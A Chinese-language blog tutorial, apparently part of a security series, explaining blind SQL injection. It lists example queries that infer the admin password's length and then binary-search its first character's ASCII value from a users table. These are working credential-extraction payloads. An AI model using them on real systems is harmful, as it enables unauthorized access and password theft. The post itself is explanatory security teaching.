SQL Injection pattern〈三〉

DAY 11

鐵人賽

1536 瀏覽

資料萃取

Blind based：透過頁面的回應 (TRUE & FALSE) 以判斷注入的指令有無成功執行。

常用的方法為推演法：

推算 admin 的密碼長度：

select * from test where A = 1 and (select len(passwd) from users where id = 1) = 1

select * from test where A = 1 and (select len(passwd) from users where id = 1) = 2

select * from test where A = 1 and (select len(passwd) from users where id = 1) = 3

得知長度後，利用二分法推算 admin 的密碼第一位：

select * from test where A = 1 and (select asc(mid(passwd,1,1)) from users where id = 1) > 128

select * from test where A = 1 and (select asc(mid(passwd,1,1)) from users where id = 1) > 64

select * from test where A = 1 and (select asc(mid(passwd,1,1)) from users where id = 1) > 32

這邊只講到這邊， Blind-based 的 Injection 同樣也有很多好玩的利用方法，以下提供網址供讀者參考：

系列文

駭客手法解析~你不能不知的資安問題!! 共 30 篇

9 人訂閱

完整目錄

直播研討會

{{ item.channelVendor }} {{ item.webinarstarted }} |

直播中

立即登入留言